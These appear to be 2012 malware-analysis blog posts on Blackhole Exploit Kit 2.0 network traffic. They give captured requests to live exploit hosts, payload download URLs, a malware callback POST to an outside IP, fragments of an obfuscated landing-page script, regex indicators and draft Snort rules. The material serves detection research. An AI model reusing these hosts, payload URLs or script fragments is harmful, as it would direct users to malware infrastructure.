So far, I have only observed instances where a get request for the root php file is made, which contains an applet archive, the second request response is a PDF download, followed by a PK jar file, followed by the binary get request. This is so predictable that when I removed Adobe Reader from my lab, the website still requested that I download the PDF and asked me where to save it (see Screen Cap 1)

Screen Cap 2
This sample really, really wanted me to log into Bank of America.

As a side note - one of the malware samples was an impatient password stealer that actually launched IE and took me to the legitimate Bank of New York web page. (See Screen Cap 2).

Once the PDF is downloaded and executed, the system requests one or a series of PK files which java executes.

Trying to Stop the Exploit (and failing miserably)

I tried a series of moves to stop the exploit, all but one of which failed, and the other was inconclusive.

• Disabling Javascript in Adobe Reader - failed to stop the exploit.
• Configured "Security Enhanced" to prevent any PDF from accessing the internet - failed to stop the exploit.
• Removed Adobe Reader - Website prompted me to save the PDF (see second screen cap)

• Installed Foxit Reader with "Security Enhancements" enabled - failed to stop the exploit.
• Configured DEP for all windows programs - inconclusive. I saw a binary get request and the malware downloaded and showed up in the task manager, but then it disappeared. I need more data on this before I can speak further on this.

Interesting enough a majority of the cases I reviewed, the actual malware launched was install_0_msi.exe followed by a KB<random number>.exe, presumably a pony downloader followed by Zeus-family.

Screen Cap 3:
Look at the task manager. Java and AcroRd32.exe.
The AcroRd32.exe is processor intensive when it opens.
Nothing shows on the screen to indicate it Adobe launched.

Screen Cap 4
Adobe and Foxit Readers security settings do not stop this attack.
In my lab, disabling Java does not affect it, neither does restricting PDF access to the internet.

Characteristics of the Blackhole 2.0 Binary Get Request:

First off, check out this article posted by Rise on malwarereports.blogspot.com

http://malwarereports.blogspot.com/2012/10/bhek-20-encode-param-value-update.html

Rise decodes the parameter values in the jar file to understand how blackhole passes the URL.

The Get Request:

The Regex for the URL string  is \.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}\&\w\w\=\w\&\w\w\=\w$
The get requests are all performed by the user agent "Java", in these cases it was update 29. 
The get requests contains no referrer, (but the PDFs do)


The Response:

• Server: nginx - Be wary this could easily be changed.
• Content-Type: application/x-msdownload
• Cache-Control: must-revalidate, post-check=0, pre-check=0 - (I would not rely on this one)
• Content-Disposition: attachment; filename="     
• The file names were one of three possibilities I observed:
• readme.exe
• info.exe
• about.exe
• Content-Transfer-Encoding: binary 

URLs (Binary get request only)

/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m
/links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&pr=n&od=v
/links/keyboard_aid_feeds.php?mf=050934030b&ue=0506050a0b0934070b06&h=02&jx=b&tj=k
/links/around_film.php?rf=050934030b&le=08040534050337333736&x=02&qb=o&zt=h
/forum/links/column.php?ff=050934030b&we=3307093738070736060b&q=02&jn=p&ep=g
/detects/signOn_go.php?ef=050934030b&me=0b350707040802093705&k=02&hz=k&kb=d
/links/calls_already_stopping.php?qf=050934030b&ue=0b36340b353507360208&p=02&kp=c&lr=p

Examples:

GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m
HTTP/1.1
User-Agent: Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 07 Oct 2012 05:09:02 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Pragma: public
Expires: Sun, 07 Oct 2012 12:42:41 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 92160

Next example

GET /links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&
pr=n&od=v HTTP/1.1
User-Agent: Java/1.6.0_29
Host: corandomotorider.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive 

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 20 Oct 2012 23:17:50 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 444494
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Pragma: public
Expires: Sat, 20 Oct 2012 23:17:50 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"  

Content-Transfer-Encoding: binary 

Next example

GET /links/keyboard_aid_feeds.php?mf=050934030b&ue=0506050a0b0934070b06&h=02&jx=b
&tj=k HTTP/1.1
User-Agent: Java/1.6.0_29
Host: postpozic.8x.biz
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive 

HTTP/1.1 200 OK
Server: nginx/1.2.4
Date: Sat, 20 Oct 2012 23:24:20 GMT
Content-Type: application/x-msdownload
Content-Length: 368640
Connection: keep-alive
Pragma: public
Expires: Sat, 20 Oct 2012 23:23:24 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Transfer-Encoding: binary

Next example

GET /links/around_film.php?rf=050934030b&le=08040534050337333736&x=02&qb=o&zt=h H
TTP/1.1
User-Agent: Java/1.6.0_29
Host: 94.23.43.55
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 21 Oct 2012 00:31:48 GMT
Content-Type: application/x-msdownload
Content-Length: 73326
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.2
Pragma: public
Expires: Sun, 21 Oct 2012 00:31:48 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary

Next example

GET /forum/links/column.php?ff=050934030b&we=3307093738070736060b&q=02&jn=p&ep=g
HTTP/1.1
User-Agent: Java/1.6.0_29
Host: secondhand4u.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 21 Oct 2012 00:54:11 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Pragma: public
Expires: Sun, 21 Oct 2012 00:52:37 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 87040

Conclusion

In conclusion, I hope that you can use this information to combat this exploit kit. As always, I welcome suggestions, feedback and teamwork. 

Possible snort rules (I'm still testing these).

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Blackhole 2.0 Binary Get Request"; content:"GET"; offset:0; content:"User-Agent: Java/1.6"; content:!"Referer"; pcre:"/\.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}\&\w\w\=\w\&\w\w\=\w$/U"; classtype:successful-user; sid:98800058;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Blackhole 2.0 binary download"; content:"HTTP/1"; content:"Content-Type: application/x-msdownload"; content:"Content-Disposition: attachment|3b| filename="; distance:0; content:"Content-Transfer-Encoding: binary"; distance:0; nocase; pcre:"/filename\=\"(readme.exe|info.exe|about.exe)/smi"; classtype:successful-user; sid:98800059;)

Shout out to @malwaremustdie and the #malwaremustdie team.

Blackhhole Exploit Kit v 2.0 URL Pattern Analysis

Written by: Frank Angiolelli, CISSP

UPDATE: 10/15/2012
Due to the high number of FPs from facebook, the regex is now tighter.

In my continuation of URL patterns in exploit kits, it appears the one I am focused on right now is  Blackhole Exploit Kit 2.0 and its URL structure follows a predictable pattern. The pattern I identified in this post appears to be BHEK 2.0. This is a running series where I am posting my intel as I go.


\.php\?\w{2,10}\=[0-9a-f]{10}\&\w{2,10}\=[a-z0-9]{2,6}\&[a-z]{2,8}\=[a-z]{2,10}\&[a-z]{2,8}\=[a-z]{2,8}$

While some of the patterns I have investigated contain greater than 10 hex in the first parameter (in 10 character increments), the majority of these have exactly 10. If you have observations that this is hitting false positives, please leave a comment below.

Some of the interesting patterns that I have discovered here are:

1. The initial point of contact contains an applet archive
2. The initial get request response has the following at offset 0 "<html><head><title></title></head><body><div dqa="asd">"
3. The response contains try,catch,try,catch, but towards the end.
4. The second and subsequent URLs (GET Requests) are a consistent match to the regex pattern above
5. In all cases I have observed, the exploit sent was a PDF with 5 letters in the name (random name).
6. The PDFs are served with "Content-Disposition: inline; filename="
7. "/Index[5 1 7 1 9 4 23 4 50 " is a good layer 7 IOC in the response packets for the PDF exploit.
8. I have observed two different sized PDFs, not sure of differences at this time.

Request:

GET /links/rules_familiar-occurred.php HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 173.246.101.197
Connection: Keep-Alive

Response:

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 14 Oct 2012 19:52:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.14-1~dotdeb.0

509

<html><head><title></title></head><body><div dqa="asd"></div><applet archive="http://173.246.101.197/links/rules_familiar-occurred.php?cjqj=0735020b0b&zwjw=4447&pdfvomu=jpjhbwls&snguplp=nvqz" code="vwqfqwfea"><param name="&#00117;&#105;&#100;" value=' < REALLY LONG VALUE>

</u><script>

if(020==0x10)d=document;
try{fsdsb^32}catch(gdsgsd){try{(d+"523")()}catch(dsgdsg){a=d[g](ggg);}}
s="";
for(i=0;;i++){
.window.asd2();
.if(r){s=s+r;}else break;
}
a=s;
s="";
k="";
asd3();
qa=0x1d;
for(i=0;i<a.length;i+=2){
.s+=ss(p(a[sss](i,2),qa));


if(021==0x11)asd();

..</script></body></html>

0


Request:

GET /links/rules_familiar-occurred.php?bklx=0735020b0b&wgaxj=43&qrfjyn=33090b0b0304080b0336&chxyb=02000200020002 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://173.246.101.197/links/rules_familiar-occurred.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 173.246.101.197
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 14 Oct 2012 19:52:47 GMT
Content-Type: application/pdf
Connection: keep-alive
Content-Length: 13388
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Accept-Ranges: bytes
Content-Disposition: inline; filename=2a34b.pdf



%PDF-1.6
%....

52 0 obj<</Length 4321/Root 1 0 R/Info 3 0 R/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream

x.bbb0b`b```.G0.....!...w.310Z...2....w...



References:
http://jsunpack.jeek.org/dec/go?report=77b050856d601de7dd7df086d4cf2c03d5043464
http://securityanalyst.co/blackhole-2-0-exploit-kit-pcap-download-wireshark-tcpdump-traffic-analysis/
http://fortknoxnetworks.blogspot.com/2012/10/url-patterns-emerging-in-new-threats.html
http://jsunpack.jeek.org/dec/go?report=43231d144a88024f6a4bdb6a890c7d51148cfae2
http://labs.vericon.li/2012/10/exploitjsblacole-gb-infection-explained-with-source-code/
http://jsunpack.jeek.org/?report=bcf3b47db058c9a6406ca55e1758d0c01790683b
http://pastebin.com/iCfC5kzY (Credit to @MALWAREMUSTDIE)
http://jsunpack.jeek.org/dec/go?report=8ec366564ae09ff7488554fffc03ad518fb5c591

URL Patterns Emerging in New Threats.

Written by Frank Angiolelli, CISSP

I continue my analysis of exploits URL and disk artifacts. This website was reported as a blackhole exploit., but some aspects of the network traffic are consistent with Neosploit, including the user agent strings involved.

In this case, I grabbed the following exploit URL.
hxxp://www.i-democracy.ru/letter.htm

Once my sandbox got hit, I started to notice some patterns from all these attacks, remembering back to the FakeAV infection I looked at September 15th. Deeper inspection shows what looks like a usable pattern. 

First, in my infection the dialect of the exploit kit was very similar in pattern to the infection method of the FakeAV and matched other traffic observed. 

GET /forum/links/column.php?boaz=0735020b0b&zpjqh=3f38&yztospu=evicnt&utkfuo=ijdxvx 

HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

GET /forum/links/column.php?boaz=0735020b0b&zpjqh=3f38&yztospu=evicnt&utkfuo=ijdxvx HTTP/1.1
accept-encoding: pack200-gzip,gzip
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m
HTTP/1.1
User-Agent: Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

Notice the differentiation in the User Agent, the initial Content-Type which is missing the subsequent requests. The initial user agent string is consistent with observed Neosploit and the binary download is consistent with java exploits where the user agent string is straight Java.

Exploit Send PDF Despite Other Exploits Avialable

What was also of interest is that this sandbox has multiple exploits available, but unlike the blackhole I analyzed on September 9th (where Media Player was exploited), this exploit kit sent a PDF file.

Next, I noticed the inline attachment pdf served by nginx server. Also, see this URLquery report



GET /forum/links/column.php?zbyg=0735020b0b&dcgdi=4b&ayj=3307093738070736060b&okn=02000200020002 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://sonatanamore.ru:8080/forum/links/column.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: sonatanamore.ru:8080
Connection: Keep-Alive



HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 07 Oct 2012 05:08:50 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Accept-Ranges: bytes
Content-Length: 13581
Content-Disposition: inline; filename=a17ee.pdf



%PDF-1.6
%....

52 0 obj<</Length 12345/Root 1 0 R/Info 3 0 R/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream

Immediately followed by the binary download, made by Java Version 29.


GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m HTTP/1.1
User-Agent: Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive



HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 07 Oct 2012 05:09:02 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Pragma: public
Expires: Sun, 07 Oct 2012 12:42:41 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 92160

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

URL Pattern Analysis:

The most interesting point  I could find in my URL analysis of the samples I saw was that they all contained ? 2 to 10 lowercase characters = followed by hexidecimal in 10 character increments, with as many as 70 characters (10, 20 and 70 to be precise). The secondary parameter in the URL is always shorter.

I believe there is a good enough pattern for url regex here, once pre-qualified for user agent java or no referrer or both. 

Generic detection: \.php\?\w{2,10}\=[0-9a-f]{10,70}\&\w{2,10}\=\w.*\&\w{2,10}\=\w

Callback

This particular sample had a cridix-like rootkit callout with what looked like a spyeye sample.On the disk, the file names (again) were  wgsdgsdgdsgsd.exe. as well as a KB<randomnumber>.exe.

POST /mx/5/A/in/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 41.168.5.140:8080
Content-Length: 350
Connection: Keep-Alive
Cache-Control: no-cache

Generic Detection: \w{2}\/\w.*\/in\/$

This user agent is identified in multiple malware samples as post infection activity and the URL string is consistent with Cridex rootkit, while the malware sample was consistent with Spyeye.

References:

http://lists.emergingthreats.net/pipermail/emerging-sigs/2011-August/015413.html

http://malwr.com/analysis/7d663d3f7d93ba2b32d456b861686501/
http://spamalysis.wordpress.com/2012/03/05/spammed-goo-gl-links/
http://www.spamhaus.org/news/article/680/
http://stopmalvertising.com/rootkits/analysis-of-cridex.html
http://fortknoxnetworks.blogspot.com/2012/09/blackhole-disk-artifacts-complete-dump.html
http://fortknoxnetworks.blogspot.com/2012/09/new-fake-av-strain-url-callbacks.html
http://user-agent-string.info/?Fuas=Mozilla%2F4.0+(Windows+XP+5.1)+Java%2F1.6.0_29&test=7823&action=analyze
http://blog.fireeye.com/research/2010/06/neosploit_notes.html
http://wepawet.iseclab.org/view.php?hash=b7cb2a698f35209f9b70eb7361e1162f&type=js
http://jsunpack.jeek.org/?report=b2f98dbcf33f74b9d99b6a6d975f9e4fb26289b5